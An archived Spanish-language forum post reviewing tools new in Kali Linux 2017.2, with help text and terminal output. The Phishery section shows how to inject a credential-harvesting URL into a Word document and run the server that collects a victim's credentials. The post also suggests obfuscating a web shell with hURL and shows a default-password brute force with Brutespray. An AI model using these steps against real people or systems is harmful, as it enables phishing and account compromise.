P
PosteameloMuseo de Posts de Taringa!
Explorar Archivo
InicioLinuxKali Linux V2017.2: Nuevas funcionalidades y herramientas.

Kali Linux V2017.2: Nuevas funcionalidades y herramientas.

Linux10/5/2017
#2017#kali linux#hacking#ciberseguridad
GIF Kali Linux es una distribución basada en Debian GNU/Linux diseñada principalmente para la auditoría y seguridad informática en general. Fue fundada y es mantenida por Offensive Security Ltd. Es una distribución especialmente diseñada para pruebas de pentesting en todos los ámbitos, debido a su gran calidad, número de herramientas y eficiencia, es la distribución de hacking más conocida a nivel mundial. Este pasado 20 de septiembre Kali Linux lanzó su ultima versión, Kali Linux 2017.2 la cual incluye un gran número significativo de cambios. A raiz del lanzamiento han salido a la luz cientos de publicaciones pero todas muy superficiales y poco útiles a decir verdad, más allá de algo meramente informativo no dicen mucho más. Este post se enfocara en explicar sus nuevas herramientas, uso y sus funciones a detalle para que sean comprensibles. La versión mencionada puede ser descargada mandándome un MP (ya que no puedo poner links) o desde su pagina oficial , si ya tienes Kali Linux instalado solamente debes ejecutar los siguientes comandos: (Sin el {color=*0000}, ni el {/color}) apt update && apt upgrade && apt full-upgrade GIF A continuación mencionaremos sus nuevas herramientas: 1. hURL (Hexadecimal & URL encoder/decoder): Es un script sencillo, ligero y que cumple con todos los requisitos al momento de usarlo. Cómo su nombre lo indica sirve para codificar/decodificar URL's en diferentes tipos de formatos o hash. Las opciones disponible las podemos ver con el comando hurl --help, también podemos ejecutarlo a modo de una especie de "GUI" mediante el comando hurl -M. [[email protected] ~]$ hurl --help.::[ hURL - hexadecimal & URL (en/de)coder ]::.v2.1 @COPYLEFT -> fnord0 riseup net USAGE: /usr/bin/hurl [ -flag|--flag ] [ -f , ] [ string ] COMMAND LINE ARGUMENTS -M|--menu => Menu-driven GUI ; /usr/bin/hurl -M -U|--URL => URL encode ; /usr/bin/hurl -U "hello world" -u|--url => uRL decode ; /usr/bin/hurl -u "hello%20world" -D|--DURL => Double URL encode ; /usr/bin/hurl -D "hello world" -d|--durl => double URL decode ; /usr/bin/hurl -d "hello%2520world" -B|--BASE64 => Base64 encode ; /usr/bin/hurl -B "hello world" -b|--base64 => base64 decode ; /usr/bin/hurl -b "aGVsbG8gd29ybGQ=" -H|--HTML => HTML encode ; /usr/bin/hurl -H "" -h|--html => hTML decode ; /usr/bin/hurl -h "<hello world>" -X|--HEX => ascii -> heX ; /usr/bin/hurl -X "hello world" --esc :: output in escaped string ; "x00x01x02x03 ..." --pair :: output in hexpair format ; 00010203 ... -x|--hex => hex -> ascii ; /usr/bin/hurl -x "68656c6c6f20776f726c64" -I|--INT => Int -> hex ; /usr/bin/hurl -I "10" -i|--int => hex -> int ; /usr/bin/hurl -i "0xa" -n|--nint => -int -> hex ; /usr/bin/hurl -n -- -77 -N|--NHEX => -hex -> iNt ; /usr/bin/hurl -N 0xffffffb3 -T|--INTB => inT -> bin ; /usr/bin/hurl -T 30 -t|--bint => bin -> int ; /usr/bin/hurl -t 1010 -F|--FLOATH => Float -> hex ; /usr/bin/hurl -F 3.33 -l|--hfloat => hex -> float ; /usr/bin/hurl -l 0x40551ed8 -o|--octh => octal -> hex ; /usr/bin/hurl -o 35 -O|--HOCT => hex -> Octal ; /usr/bin/hurl -O 0x12 -0|--binh => bin -> hex ; /usr/bin/hurl -0 1100011 -1|--hexb => hex -> bin ; /usr/bin/hurl -1 0x63 -2|--SHA1 => SHA1 checksum ; /usr/bin/hurl -2 "hello world" -3|--SHA224 => SHA224 checksum ; /usr/bin/hurl -3 "hello world" -4|--SHA256 => SHA256 checksum ; /usr/bin/hurl -4 "hello world" -5|--SHA384 => SHA384 checksum ; /usr/bin/hurl -5 "hello world" -6|--SHA512 => SHA512 checksum ; /usr/bin/hurl -6 "hello world" -7|--ROT13 => ROT13 encode ; /usr/bin/hurl -7 "hello world" -8|--rot13 => ROT13 decode ; /usr/bin/hurl -8 "uryyb jbeyq" -9|--stack => push string 2 stack (corelan) ; /usr/bin/hurl -9 "hello world" --esc :: output in escaped string ; "x00x01x02x03 ..." --pair :: output in hexpair format ; 00010203 ... --ansiC :: output in C format ; 0x00, 0x01, 0x02, 0x03 ... -m|--md5 => md5 digest ; /usr/bin/hurl -m "hello world" -e|--net => int -> hex (net-byte order) ; /usr/bin/hurl -e 4444 -E|--NET => hex (nEt-byte order) -> int ; /usr/bin/hurl -E 5c11 -w|--wbin => hex -> binary ; /usr/bin/hurl -w -f -r|--rbin => binary -> hex (corelan); /usr/bin/hurl -r -f /tmp/msgbox.bin --esc :: output in escaped string ; "x00x01x02x03 ..." --pair :: output in hexpair format ; 00010203 ... --ansiC :: output in C format ; 0x00, 0x01, 0x02, 0x03 ... --color|--nocolor => enable/disable colored output [default is ENABLED] --corelan => display corelan reference --help => displays help --man => displays extended help with examples --version => displays version information -s => suppress (display result only) -f|--file , => use file(s) as input => string as input [[email protected] ~]$ hurl -M [========================================================] [ hURL - v2.1 by fnord0 - @COPYLEFT ] [========================================================] ## Command Example Input Example Output --- ---------------- ------------- -------------- 1) URL encode hello world hello%20world 2) URL decode hello%20world hello world 3) Double URL encode hello world hello%2520world 4) Double URL decode hello%2520world hello world 5) Base64 encode hello world aGVsbG8gd29ybGQ= 6) Base64 decode aGVsbG8gd29ybGQ= hello world 7) HTML encode <hello world> 8) HTML decode <hello world> hello world 9) RAW/ascii -> HEX hello world 68656c6c6f20776f726c64 10) HEX -> RAW/ascii 68656c6c6f20776f726c64 hello world 11) INT -> HEX 10 0xa 12) HEX -> INT 0xa 10 13) -INT -> HEX -77 FFFFFFFFFFFFFFB3 14) -HEX -> INT FFFFFFB3 -77 15) INT -> BIN 30 00011110 16) BIN -> INT 1010 10 17) FLOAT -> HEX 3.33 0xb81e5540 18) HEX -> FLOAT 0x40551ed8 1079320280.000000 19) OCTAL -> HEX 35 0x1d 20) HEX -> octal 0x1d 35 21) BIN -> HEX 1100011 0x63 22) HEX -> BIN 63 1100011 23) SHA1 checksum hello world 2aae6c35c94fcfb415dbe95f408b9ce9... 24) SHA224 checksum hello world 2f05477fc24bb4faefd86517156dafde... 25) SHA256 checksum hello world b94d27b9934d3e08a52e52d7da7dabfa... 26) SHA384 checksum hello world fdbd8e75a67f29f701a4e040385e2e23... 27) SHA512 checksum hello world 309ecc489c12d6eb4cc40f50c902f2b4... 28) ROT13 encode hello world uryyb jbeyq 29) ROT13 decode uryyb jbeyq hello world 30) MD5 digest hello world 5eb63bbbe01eeed093cb22bb8f5acdc3 ## Commands useful for shellcode creation Input Output --- -------------------------------------- ----- ------ 31) push string 2 stack (corelanc0d3r) hello world ASM code to push string to stack 32) BINARY -> HEX (corelanc0d3r) BINARY FILE HEX to screen + counts NULL bytes 33) HEX -> BINARY HEX FILE BINARY FILE 34) INT -> HEX (network-byte order) 4444 5c11 35) HEX (network-byte order) -> INT 5c11 4444 99) Exit hURLhURL> 5hURL:Base64encode> string or file? :: hURL:Base64encode:string> http://securityhacklabs.blogspot.comOriginal :: http://securityhacklabs.blogspot.combase64 ENcoded :: aHR0cDovL3NlY3VyaXR5aGFja2xhYnMuYmxvZ3Nwb3QuY29tPress ENTER to continue... GIF Es una herramienta a la que podemos además darle otros usos como codificar archivos también para después darles otro uso (payloads codificados o simplemente ofuscar el código para que no sea visible a todo el mundo cuando queramos subir una shell a un servidor, son ejemplos). [[email protected] ~]$ echo "https://securityhacklabs.blogspot.com" > test[[email protected] ~]$ hurl -X -f testOriginal file :: testHex ENcoded :: 68747470733a2f2f73656375726974796861636b6c6162732e626c6f6773706f742e636f6dFile byte count: 37 bytes[[email protected] ~]$ hurl -X --esc -f testOriginal file :: testHex ENcoded :: "x68x74x74x70x73x3ax2fx2fx73x65x63x75x72x69x74x79x68x61x63x6bx6cx61x62x73x2ex62x6cx6fx67x73x70x6fx74x2ex63x6fx6d"File byte count: 37 bytes[[email protected] ~]$ 2. Phishery: Es un servidor HTTP SSL simple con el propósito principal de robar credenciales por medio de phishing mediante la autenticación básica en sistemas windows. Phishery también proporciona la capacidad de inyectar fácilmente URL's maliciosas en documentos .docx de Word. El poder de phishery se demuestra mejor cambiando la plantilla de un documento de Word en una URL de phishery. Esto hace que Microsoft Word haga una solicitud a la dirección URL inyectada, lo que resulta en un cuadro de diálogo de autenticación que se muestra al usuario final. La posibilidad de inyectar cualquier archivo .docx con una URL se puede hacer de la siguiente manera: [[email protected] ~]$ phishery -u https://securityhacklabs.blogspot.com -i ~/documento.docx -o ~/documentoinfectado.docx[+] Opening Word document: /home/shl/documento.docx[+] Setting Word document template to: https://securityhacklabs.blogspot.com[+] Saving injected Word document to: /home/shl/documentoinfectado.docx
  • Injected Word document has been saved![[email protected] ~]$ Si la injección ha sido exitosa, cuando el usuario final abra el archivo .docx se le presentará una ventana cómo la que aparece a continuación. GIF Nota: Es importante cambiar la URL a la que deseamos que nuestra víctima envíe sus credenciales, es decir, colocar en el parámetro -u la dirección IP y el puerto generado al ejecutar cómo root el comando phishery. [[email protected] ~]$ sudo phishery password for shl: [+] Credential store initialized at: credentials.json[+] Starting HTTPS Auth Server on: 0.0.0.0:443 Las credenciales robadas se guardarán en el fichero credentials.json. 3. SSH-Audit: Una herramienta diseñada para auditar servicios SSH en servidores la cual puede detectar tipos de encriptación, sistemas operativos, versiones usadas, recomendar posibles exploits para usar en cada versión del software ejecutado en el objetivo, soporta los protocolos SSH1 y SSH2 y recomienda algoritmos de acuerdo al software que sea reconocido en el objetivo. [[email protected] ~]$ ssh-audit # ssh-audit.py v1.7.0, [email protected]: ssh-audit.py [-1246pbnvl] -h, --help print this help -1, --ssh1 force ssh version 1 only -2, --ssh2 force ssh version 2 only -4, --ipv4 enable IPv4 (order of precedence) -6, --ipv6 enable IPv6 (order of precedence) -p, --port= port to connect -b, --batch batch output -n, --no-colors disable colors -v, --verbose verbose output -l, --level= minimum output level (info|warn|fail) Para usarlo necesitamos un servidor corriendo SSH, tomamos cómo ejemplo Github. El uso básico es sencillo: ssh-audit $servidor. [[email protected] ~]$ ssh-audit github.com# general(gen) banner: SSH-2.0-libssh_0.7.0(gen) compatibility: OpenSSH 6.5-6.6, Dropbear SSH 2013.62+ (some functionality from 0.52)(gen) compression: enabled (zlib, [email protected])# key exchange algorithms(kex) [email protected] -- available since OpenSSH 6.5, Dropbear SSH 2013.62(kex) ecdh-sha2-nistp256 -- using weak elliptic curves `- available since OpenSSH 5.7, Dropbear SSH 2013.62(kex) ecdh-sha2-nistp384 -- using weak elliptic curves `- available since OpenSSH 5.7, Dropbear SSH 2013.62(kex) ecdh-sha2-nistp521 -- using weak elliptic curves `- available since OpenSSH 5.7, Dropbear SSH 2013.62(kex) diffie-hellman-group-exchange-sha256 -- using custom size modulus (possibly weak) `- available since OpenSSH 4.4(kex) diffie-hellman-group14-sha1 -- using weak hashing algorithm `- available since OpenSSH 3.9, Dropbear SSH 0.53(kex) diffie-hellman-group1-sha1 -- removed (in server) since OpenSSH 6.7, unsafe algorithm `- disabled (in client) since OpenSSH 7.0, logjam attack `- using small 1024-bit modulus `- using weak hashing algorithm `- available since OpenSSH 2.3.0, Dropbear SSH 0.28# host-key algorithms(key) ssh-dss -- removed (in server) and disabled (in client) since OpenSSH 7.0, weak algorithm `- using small 1024-bit modulus `- using weak random number generator could reveal the key `- available since OpenSSH 2.1.0, Dropbear SSH 0.28(key) ssh-rsa -- available since OpenSSH 2.5.0, Dropbear SSH 0.28# encryption algorithms (ciphers)(enc) [email protected] -- available since OpenSSH 6.5 `- default cipher since OpenSSH 6.9.(enc) aes256-ctr -- available since OpenSSH 3.7, Dropbear SSH 0.52(enc) aes192-ctr -- available since OpenSSH 3.7(enc) aes128-ctr -- available since OpenSSH 3.7, Dropbear SSH 0.52(enc) aes256-cbc -- removed (in server) since OpenSSH 6.7, unsafe algorithm `- using weak cipher mode `- available since OpenSSH 2.3.0, Dropbear SSH 0.47(enc) aes192-cbc -- removed (in server) since OpenSSH 6.7, unsafe algorithm `- using weak cipher mode `- available since OpenSSH 2.3.0(enc) aes128-cbc -- removed (in server) since OpenSSH 6.7, unsafe algorithm `- using weak cipher mode `- available since OpenSSH 2.3.0, Dropbear SSH 0.28(enc) blowfish-cbc -- removed (in server) since OpenSSH 6.7, unsafe algorithm `- disabled since Dropbear SSH 0.53 `- disabled (in client) since OpenSSH 7.2, legacy algorithm `- using weak cipher mode `- using small 64-bit block size `- available since OpenSSH 1.2.2, Dropbear SSH 0.28# message authentication code algorithms(mac) hmac-sha2-256 -- using encrypt-and-MAC mode `- available since OpenSSH 5.9, Dropbear SSH 2013.56(mac) hmac-sha2-512 -- using encrypt-and-MAC mode `- available since OpenSSH 5.9, Dropbear SSH 2013.56(mac) hmac-sha1 -- using encrypt-and-MAC mode `- using weak hashing algorithm `- available since OpenSSH 2.1.0, Dropbear SSH 0.28# algorithm recommendations (for OpenSSH 6.5)(rec) -ecdh-sha2-nistp521 -- kex algorithm to remove (rec) -ecdh-sha2-nistp384 -- kex algorithm to remove (rec) -ecdh-sha2-nistp256 -- kex algorithm to remove (rec) -diffie-hellman-group1-sha1 -- kex algorithm to remove (rec) -diffie-hellman-group14-sha1 -- kex algorithm to remove (rec) -ssh-dss -- key algorithm to remove (rec) +ssh-ed25519 -- key algorithm to append (rec) -aes192-cbc -- enc algorithm to remove (rec) -aes128-cbc -- enc algorithm to remove (rec) -blowfish-cbc -- enc algorithm to remove (rec) -aes256-cbc -- enc algorithm to remove (rec) [email protected] -- enc algorithm to append (rec) [email protected] -- enc algorithm to append (rec) -hmac-sha2-512 -- mac algorithm to remove (rec) -hmac-sha1 -- mac algorithm to remove (rec) -hmac-sha2-256 -- mac algorithm to remove (rec) [email protected] -- mac algorithm to append (rec) [email protected] -- mac algorithm to append (rec) [email protected] -- mac algorithm to append Esta herramienta es bastante útil si queremos explotar fallos SSH en versiones antiguas de software instalado, si queremos una información más detallada basta con ejecutar: ssh-audit -l info $servidor. GIF 4. APT2 (Automated Penetration Tool): APT2, es una herramienta diseñada para realizar diferentes tipos de escaneos utilizando Nmap o bien, importar resultados generados por Nexpose, Nessus o Nmap.Los resultados y reportes son generados en formato HTML para que sean más comprensibles al usuario final. APT2 ha sido probado hasta el nomento en sistemas GNU/Linux solamente, para que se ejecute su módulo principal necesitamos tener instalada la librería python2-nmap. Si deseamos un escaner más robusto y con más características necesitamos instalar las siguientes dependencias: convert, dirb, hydra, java, john, ldapsearch, msfconsole, nmap, nmblookup, phantomjs, responder, rpcclient, secretsdump.py, smbclient, snmpwalk, sslscan y xwd. Su configuración puede ser modificada, lo que hace que sea muy sencilla y fácil de adaptar a nuestras necesidades, es archivo de configuración está en /usr/share/apt2/misc/default.cfg, o bien en el directorio /misc dentro de la instalación o descarga de APT2. * Identificar servicios y sistemas operativos. * Tomas capturas de pantalla de aplicaiones web, VNC, X11, etc. * Analizar servicios FTP y archivos compartidos. * Lanzar ataques de fuerza bruta. * Lanzar módulos de metasploit. * Desencriptar hashes usando Jhon The Ripper/Hashcat. 5. BloodHunt: Es una herramienta que usa la teoría de los gráficos para identificar y revelar rutas no deseadas dentro de un entorno de Active Directory, las cuales pueden ser usadas por un atacante para obtener accesos no autorizados o bien por el administrador de un Active Directory para corregir los fallos. BloodHunt es una aplicación web JavaScript de una sola página, basada en Linkurious,compilada con Electron y con una base de datos Neo4j la cual es conectada mediante PowerShell. GIF 6. CrackMapExec(CME): Es una herramienta de post-explotación que ayuda a automatizar la evaluación de la seguridad en grandes redes con Active Directory. CME sigue el principio "Viviendo de la tierra", es decir, utiliza funciones y protocoloes propios de Active Directory para funcionar lo que le permite evadir la mayoría de IDS (Sistema de deteccion de intrusos)/IPS y medidas de seguridad implementadas normalmente. Inicialmente fue diseñada para realizar ataques pero puede ser usada por auditores/administradores para analizar sus redes y corregir fallos. CME facilita el uso de PowerSploit, una herramienta que utiliza funciones propias de PowerShell para realizar técnicas de ataque y explotación. GIF 7. Dbeaver: Es un cliente para el manejo de bases de datos que soporta los muchos tipos de bases de datos entre ellos: MySQL, PostgreSQL, MariaDB, SQLite, Oracle, DB2, SQL Server, Sybase, MS Access, Teradata, Firebird, Derby, etc. Especial para el manejo de servidores o laboratorios propios que deseemos crear para realizar pruebas de pentesting. 8. Brutespray: Brutespray es una herramienta que funciona de la siguiente manera: Realiza un escaneo con Nmap y de acuerdo a sus resultados comprueba contraseñas y usuarios por defecto en servicios encontrados usando el cracker de contraseñas Medusa. A continuación tendremos la salida por terminal de brutespray para que entiendan el funcionamiento de esta herramienta. [[email protected] ~]$ nmap localhost -oG test.gnmapStarting Nmap 7.60 ( https://nmap.org ) at 2017-09-26 23:24 UTCNmap scan report for localhost (127.0.0.1)Host is up (0.000037s latency).Not shown: 994 closed portsPORT STATE SERVICE22/tcp open ssh53/tcp open domain80/tcp open http3306/tcp open mysql5432/tcp open postgresql9050/tcp open tor-socksNmap done: 1 IP address (1 host up) scanned in 0.04 seconds[[email protected] ~]$ less test.gnmap [[email protected] ~]$ sudo brutespray --file /home/shl/test.gnmap --threads 5 --hosts 5 brutespray.py v1.5.2 Created by: Shane Young/@x90skysn3k && Jacob Robles/@shellfail Inspired by: Leon Johnson/@sho-luv Credit to Medusa: JoMo-Kun / Foofus Networks <[email protected]>Starting to brute, please make sure to use the right amount of threads(-t) and parallel hosts(-T)... Brute-Forcing... Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <[email protected]>ACCOUNT CHECK: Host: 127.0.0.1 (1 of 1, 0 complete) User: root (1 of 2, 1 complete) Password: password (1 of 4 complete) ACCOUNT CHECK: Host: 127.0.0.1 (1 of 1, 0 complete) User: root (1 of 2, 1 complete) Password: admin (2 of 4 complete)ACCOUNT CHECK: Host: 127.0.0.1 (1 of 1, 0 complete) User: admin (2 of 2, 1 complete) Password: admin (1 of 4 complete)ACCOUNT CHECK: Host: 127.0.0.1 (1 of 1, 0 complete) User: admin (2 of 2, 1 complete) Password: root (2 of 4 complete)ACCOUNT CHECK: Host: 127.0.0.1 (1 of 1, 0 complete) User: root (1 of 2, 1 complete) Password: toor (3 of 4 complete)ACCOUNT CHECK: Host: 127.0.0.1 (1 of 1, 0 complete) User: root (1 of 2, 2 complete) Password: root (4 of 4 complete)ACCOUNT CHECK: Host: 127.0.0.1 (1 of 1, 0 complete) User: admin (2 of 2, 2 complete) Password: toor (3 of 4 complete)ACCOUNT CHECK: Host: 127.0.0.1 (1 of 1, 0 complete) User: admin (2 of 2, 2 complete) Password: password (4 of 4 complete)Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <[email protected]>ACCOUNT CHECK: Host: 127.0.0.1 (1 of 1, 0 complete) User: root (1 of 3, 0 complete) Password: Password1 (1 of 8 complete)ACCOUNT CHECK: Host: 127.0.0.1 (1 of 1, 0 complete) User: root (1 of 3, 0 complete) Password: toor (2 of 8 complete)ACCOUNT CHECK: Host: 127.0.0.1 (1 of 1, 0 complete) User: root (1 of 3, 0 complete) Password: password (3 of 8 complete)ACCOUNT CHECK: Host: 127.0.0.1 (1 of 1, 0 complete) User: root (1 of 3, 0 complete) Password: root (4 of 8 complete)ACCOUNT CHECK: Host: 127.0.0.1 (1 of 1, 0 complete) User: root (1 of 3, 1 complete) Password: password1 (5 of 8 complete)ACCOUNT CHECK: Host: 127.0.0.1 (1 of 1, 0 complete) User: root (1 of 3, 1 complete) Password: password123 (6 of 8 complete)ACCOUNT CHECK: Host: 127.0.0.1 (1 of 1, 0 complete) User: root (1 of 3, 1 complete) Password: Password123 (7 of 8 complete)ACCOUNT CHECK: Host: 127.0.0.1 (1 of 1, 0 complete) User: admin (2 of 3, 1 complete) Password: postgres (1 of 8 complete)ACCOUNT CHECK: Host: 127.0.0.1 (1 of 1, 0 complete) User: root (1 of 3, 1 complete) Password: postgres (8 of 8 complete)ACCOUNT CHECK: Host: 127.0.0.1 (1 of 1, 0 complete) User: admin (2 of 3, 1 complete) Password: root (2 of 8 complete)ACCOUNT CHECK: Host: 127.0.0.1 (1 of 1, 0 complete) User: admin (2 of 3, 1 complete) Password: toor (3 of 8 complete)ACCOUNT CHECK: Host: 127.0.0.1 (1 of 1, 0 complete) User: admin (2 of 3, 1 complete) Password: Password1 (4 of 8 complete)ACCOUNT CHECK: Host: 127.0.0.1 (1 of 1, 0 complete) User: admin (2 of 3, 1 complete) Password: password (5 of 8 complete)ACCOUNT CHECK: Host: 127.0.0.1 (1 of 1, 0 complete) User: admin (2 of 3, 1 complete) Password: password1 (6 of 8 complete)ACCOUNT CHECK: Host: 127.0.0.1 (1 of 1, 0 complete) User: admin (2 of 3, 2 complete) Password: Password123 (7 of 8 complete)ACCOUNT CHECK: Host: 127.0.0.1 (1 of 1, 0 complete) User: admin (2 of 3, 2 complete) Password: password123 (8 of 8 complete)ACCOUNT CHECK: Host: 127.0.0.1 (1 of 1, 0 complete) User: postgres (3 of 3, 2 complete) Password: postgres (1 of 8 complete)ACCOUNT FOUND: Host: 127.0.0.1 User: postgres Password: postgres ACCOUNT CHECK: Host: 127.0.0.1 (1 of 1, 0 complete) User: postgres (3 of 3, 3 complete) Password: toor (2 of 8 complete)ACCOUNT FOUND: Host: 127.0.0.1 User: postgres Password: toor ACCOUNT CHECK: Host: 127.0.0.1 (1 of 1, 0 complete) User: postgres (3 of 3, 4 complete) Password: Password1 (3 of 8 complete)ACCOUNT FOUND: Host: 127.0.0.1 User: postgres Password: Password1 ACCOUNT CHECK: Host: 127.0.0.1 (1 of 1, 0 complete) User: postgres (3 of 3, 5 complete) Password: root (4 of 8 complete)ACCOUNT FOUND: Host: 127.0.0.1 User: postgres Password: root ACCOUNT CHECK: Host: 127.0.0.1 (1 of 1, 0 complete) User: postgres (3 of 3, 6 complete) Password: password (5 of 8 complete)ACCOUNT FOUND: Host: 127.0.0.1 User: postgres Password: password Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <[email protected]> GIF Recomendaciones. 1. A pesar de que Kali Linux es una distribución que tomó el modelo rolling-release, aún no se acopla en su totalidad a dicho modelo y por lo tanto las grandes actualizaciones (entre versiones) terminan con paquetes y/o tuberías rotas, lo más recomendable es que hagas un backup de tus datos y reinstales la distribución desde la ISO nueva. 2. Si aún conociendo los riesgos anteriores deseas no reinstalar, BAJO NINGÚN MOTIVO ejecutes directamente el apt update && apt-dist-upgrade, debido a que muchas de las nuevas librerías y/o paquetes dependen de otras nuevas es MUY RECOMENDABLE ejecutar el apt upgrade antes de pasar a la siguiente versión. 3. Si reinstalas Kali Linux (O cualquier otra distribución) siempre debes dejar al menos la carpeta /home/$user por fuera del disco root, es decir, en una partición aparte. De este modo evitas tener que realizar backups fuera de la unidad o tener que volver a descargar archivos. 4. Existe una distribución de Hacking que es modelo Rolling-release por naturaleza: BlackArch. ¡Pruebala! Security Hack Labs la recomienda. 5. Otra opción es que utilices la reconocida y pretigiosa distribución ArchLinux cómo una distribución de hacking. 6. Si deseas conocer cual versión de Kali Linux estás usando luego de actualizar, basta con que escribas el comando: lsb_release -a. GIF
    • Datos archivados del Taringa! original
    40puntos
    608visitas
    0comentarios
    Actividad nueva en Posteamelo
    0puntos
    5visitas
    0comentarios
    Dar puntos:

    Dejá tu comentario

    0/2000

    Autor del Post

    G
    GruffyWTF🇦🇷
    Usuario
    Puntos0
    Posts29
    Ver perfil →
    PosteameloArchivo Histórico de Taringa! (2004-2017). Preservando la inteligencia colectiva de la internet hispanohablante.

    LEGAL

    CONTACTO

    18 de Septiembre 455, Casilla 52

    Chillán, Región de Ñuble, Chile

    Solo correo postal

    © 2026 Posteamelo.com. No afiliado con Taringa! ni sus sucesores.

    Contenido preservado con fines históricos y culturales.